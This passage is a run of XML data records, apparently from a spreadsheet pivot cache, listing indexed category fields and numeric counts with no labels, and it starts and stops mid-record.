    <x v="0"/>
    <x v="6"/>
    <n v="17"/>
    <x v="118"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="118"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="118"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="118"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="118"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="118"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="118"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="118"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="119"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="119"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="119"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="119"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="119"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="119"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="119"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="119"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="119"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="119"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="119"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="119"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="119"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="119"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="120"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="120"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="120"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="120"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="120"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="120"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="120"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="120"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="4"/>
    <x v="120"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="120"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="120"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="120"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="21"/>
    <x v="120"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="120"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="121"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="121"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="121"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="121"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="121"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="121"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="121"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="12"/>
    <x v="121"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="121"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="121"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="121"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="121"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="121"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="121"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="122"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="122"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="122"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="122"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="7"/>
    <x v="122"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="122"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="122"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="122"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="122"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="44"/>
    <x v="122"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="55"/>
    <x v="122"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="122"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="122"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="122"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="122"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="123"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="123"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="123"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="123"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="148"/>
    <x v="123"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="123"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="123"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="123"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="123"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="123"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="123"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="123"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="123"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="123"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="124"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="124"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="124"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="124"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="124"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="124"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="124"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="124"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="124"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="124"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="124"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="124"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="124"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="124"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="125"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="125"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="125"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="125"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="12"/>
    <x v="125"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="125"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="125"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="125"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="10"/>
    <x v="125"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="125"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="125"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="125"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="125"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="125"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="126"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="126"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="6"/>
    <x v="126"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="50"/>
    <x v="126"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="126"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="126"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="126"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="126"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="5"/>
    <x v="126"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="5"/>
    <x v="126"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="126"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="126"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="1"/>
    <x v="126"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="126"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="126"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="126"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="126"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="126"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="50"/>
    <x v="126"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="127"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="127"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="127"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="127"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="127"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="127"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="127"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="127"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="127"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="127"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="7"/>
    <x v="127"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="127"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="127"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="127"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="128"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="128"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="128"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="128"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="128"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="128"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="128"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="128"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="128"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="128"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="128"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="34"/>
    <x v="128"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="128"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="128"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="129"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="129"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="129"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="129"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="129"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="129"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="129"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="129"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="129"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="129"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="129"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="129"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="129"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="129"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="130"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="130"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="2"/>
    <x v="130"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="130"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="130"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="130"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="130"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="130"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="130"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="130"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="130"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="7"/>
    <x v="130"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="130"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="130"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="131"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="131"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="131"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="131"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="131"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="131"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="131"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="131"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="131"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="131"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="131"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="131"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="131"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="131"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="132"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="132"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="132"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="132"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="132"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="132"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="132"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="132"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="132"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="132"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="132"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="132"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="132"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="132"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="132"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="132"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="133"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="133"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="133"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="133"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="133"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="133"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="12"/>
    <x v="133"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="133"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="133"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="133"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="133"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="133"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="27"/>
    <x v="133"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="133"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="134"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="134"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="134"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="134"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="134"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="134"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="134"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="134"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="134"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="134"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="134"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="134"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="134"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="134"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="135"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="135"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="135"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="135"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="135"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="135"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="135"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="135"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="135"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="135"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="34"/>
    <x v="135"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="96"/>
    <x v="135"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="31"/>
    <x v="135"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="135"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="136"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="136"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="136"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="136"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="136"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="136"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="136"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="136"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="136"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="136"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="34"/>
    <x v="136"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="15"/>
    <x v="136"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="136"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="136"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="137"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="137"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="137"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="137"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="137"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="137"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="137"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="137"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="5"/>
    <x v="137"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="137"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="137"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="137"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="137"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="137"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="138"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="138"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="138"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="138"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="31"/>
    <x v="138"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="56"/>
    <x v="138"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="113"/>
    <x v="138"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="73"/>
    <x v="138"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="138"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="138"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="555"/>
    <x v="138"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="476"/>
    <x v="138"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="138"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="138"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="139"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="139"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="139"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="139"/>
  </r>
  <r>
